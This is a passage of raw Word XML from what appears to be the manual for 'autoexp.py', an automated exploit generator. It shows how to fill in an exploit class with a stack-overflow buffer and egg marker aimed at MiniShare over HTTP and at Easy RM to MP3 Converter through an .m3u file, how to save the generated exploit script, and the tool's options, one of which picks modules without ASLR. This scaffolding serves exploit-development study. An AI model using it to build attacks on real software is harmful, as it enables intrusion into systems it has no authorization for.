      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>func_hl.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEBEF4" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>return func_hl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67804791" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A183A6" w14:textId="3F4676F8" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>return async_func</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C469589" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FD3B8C" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="00E3087E" w:rsidRDefault="008E3474" w:rsidP="00C41693">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62068D90" w14:textId="7B8EF235" w:rsidR="00B22735" w:rsidRDefault="00E3087E" w:rsidP="00B22735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc462491416"/>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00B22735">
        <w:t>Populate the exploit class with PoC/crash info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="50D5A96F" w14:textId="23CD466B" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The exploit code has to be migrated to Python, and defined in the "exploit()" function. It will have one variable currently, which is the buffer itself, which overwrites the stack. This buffer will be modified by the autoexp.py script. An example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1FA6A" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>def exploit(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25808E59" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE1BE01" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>This function runs the actual exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224305C1" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00408B58" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472E545C" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57671966" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>sock.connect(('127.0.0.1',80))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29464D53" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>#Test 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091138E1" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>message = "GET " + ''.join(self.buffer) + " HTTP/1.1\r\n\r\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFCD67" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>sock.send(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37D510" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="0014579D" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014579D">
        <w:tab/>
        <w:t>sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5AF56" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In general we have to insert the code snippet, where we would put our buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29545F12" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="0014579D">
        <w:t>''.join(self.buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CFED70" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The reason for the join is that the script will build the malicious code, from multiple parts, each of them will be stored in a string, and overall it will be in an array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D4A87E" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1450DC91" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally we need to set the initial buffer, along with a marker (egg), as an array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A64A3" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="0014579D">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="008E3474">
        <w:t>self.buffer = [self.egg*2, "A"*2992]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63C9BC" w14:textId="77777777" w:rsidR="008E3474" w:rsidRDefault="008E3474" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The default egg is 4 byte long (EGGG), so from the crash PoC buffer length substract 8, and put that into the second part.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EA4D0" w14:textId="6CBF7852" w:rsidR="008E3474" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc462491417"/>
      <w:r>
        <w:t>3.3 Additional info to populate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0643A938" w14:textId="7981C677" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:r>
        <w:t>You need to define the program path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877DDB9" w14:textId="6D7968E0" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>self.command = 'C:\\Program Files (x86)\\Easy RM to MP3 Converter\\RM2MP3Converter.exe /cf'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124D91A" w14:textId="745CF605" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:r>
        <w:t>If it’s an application, where the exploit will be in a file, you need to set the following variables as well:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E063B49" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>self.filename = 'c:\\autoexploit\\list.m3u'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E28E79" w14:textId="3B808270" w:rsidR="006B0AE1" w:rsidRPr="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="006B0AE1">
        <w:t>self.file_based = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC198D7" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRPr="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1"/>
    <w:p w14:paraId="6A87E3B5" w14:textId="294A2800" w:rsidR="00513E99" w:rsidRDefault="00B35FE5" w:rsidP="005C2D79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc462491418"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.4 Saving the exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="202BA1D3" w14:textId="24BDFA43" w:rsidR="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once the exploit is generated we want to save it for future use. In case of a file based exploit we don’t need to do anything since the file is already generated, however in other cases we will want to save it. This is basically writing out the python script to a file with unescaping the characters in the buffer. Like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCAD48" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>def save(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2092F3" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>f = open('minishare_exploit.py','w')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2657E" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t xml:space="preserve">f.write("import socket\n\n" + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC7E38" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B31678" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>"sock.connect(('127.0.0.1',80))\n" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171B143" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>"message = 'GET " + ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer)) + " HTTP/1.1\\r\\n\\r\\n'\n" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA55F9" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>"sock.send(message)\n" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0EF6C" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>"sock.close()\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47610D55" w14:textId="14DDE465" w:rsidR="00B35FE5" w:rsidRPr="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B35FE5">
        <w:tab/>
        <w:t>f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736A193" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5"/>
    <w:p w14:paraId="75E157F2" w14:textId="1D8292E4" w:rsidR="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:r>
        <w:t>In file based versions we can keep it simple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54103E10" w14:textId="77777777" w:rsidR="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>def save(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7CD0F" w14:textId="0E29D2C4" w:rsidR="00B35FE5" w:rsidRDefault="00B35FE5" w:rsidP="00B35FE5">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296515D2" w14:textId="3748169D" w:rsidR="005C2D79" w:rsidRDefault="00B35FE5" w:rsidP="005C2D79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc462491419"/>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidR="005C2D79">
        <w:t xml:space="preserve"> Running the autoexp.py script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="74413F2A" w14:textId="7CA1460F" w:rsidR="0014579D" w:rsidRDefault="006B0AE1" w:rsidP="0014579D">
      <w:r>
        <w:t>These are the script options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C0680" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="0014579D"/>
    <w:p w14:paraId="71FD45C3" w14:textId="3C2B0825" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>c:\autoexploit&gt;autoexp.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A3417" w14:textId="243F4E4F" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>usage: autoexp.py [-h] -e EXPLOIT [-a] [-t TYPE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D1FB6" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C965C49" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Automated exploit generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5F4E30" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56474FF8" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>optional arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D3B058" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -h, --help            show this help message and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20CBE1" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -e EXPLOIT, --exploit EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A3B26" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        exploit class file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBF46D" w14:textId="77777777" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -a, --aslr            Try to use modules w/o ASLR enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A240FB" w14:textId="79DCC858" w:rsidR="006B0AE1" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -t TYPE, --type TYPE  Exploit type (bof,...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C7D82" w14:textId="16F01F20" w:rsidR="006B0AE1" w:rsidRPr="0014579D" w:rsidRDefault="006B0AE1" w:rsidP="006B0AE1">
      <w:r>
        <w:t>The type is currently ignored, it’s added for future.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B0AE1" w:rsidRPr="0014579D">
      <w:footerReference w:type="default" r:id="rId14"/>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D13C53" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="hu"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04262C" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A348FA2" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="hu"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D770F1E" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A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171722"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="2C4C1277" w14:textId="77777777" w:rsidR="00EA669F" w:rsidRDefault="00FF5EB3">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="hu"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="hu"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:bidi="hu"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CB1173">
          <w:rPr>
            <w:noProof/>
            <w:lang w:bidi="hu"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:lang w:bidi="hu"/>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DC509C" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="hu"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D559B" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03B8FC8D" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="hu"/>
        </w:rPr>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABD663E" w14:textId="77777777" w:rsidR="007A7A29" w:rsidRDefault="007A7A29"/>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02590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DC82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4A2605"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="452029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49493E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4086AC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F1175B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1E0F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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="11"/>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0D1"/>
    <w:rsid w:val="00053C76"/>
    <w:rsid w:val="00074B3C"/>
    <w:rsid w:val="000F60C1"/>
    <w:rsid w:val="0014579D"/>
    <w:rsid w:val="00166880"/>
    <w:rsid w:val="002757BC"/>
    <w:rsid w:val="002F01C3"/>
    <w:rsid w:val="003C43CC"/>
    <w:rsid w:val="00421D00"/>
    <w:rsid w:val="00513E99"/>
    <w:rsid w:val="00522848"/>
    <w:rsid w:val="005420D1"/>
    <w:rsid w:val="005A21D7"/>
    <w:rsid w:val="005C2D79"/>
    <w:rsid w:val="005D1E18"/>
    <w:rsid w:val="006B0AE1"/>
    <w:rsid w:val="006C6776"/>
    <w:rsid w:val="007A7A29"/>
    <w:rsid w:val="008C7EC2"/>
    <w:rsid w:val="008E3474"/>
    <w:rsid w:val="0094195C"/>
    <w:rsid w:val="00A02DA6"/>
    <w:rsid w:val="00B22735"/>
    <w:rsid w:val="00B35FE5"/>
    <w:rsid w:val="00B6623A"/>
    <w:rsid w:val="00B9598D"/>
    <w:rsid w:val="00C41693"/>
    <w:rsid w:val="00C55D68"/>
    <w:rsid w:val="00C77DB7"/>
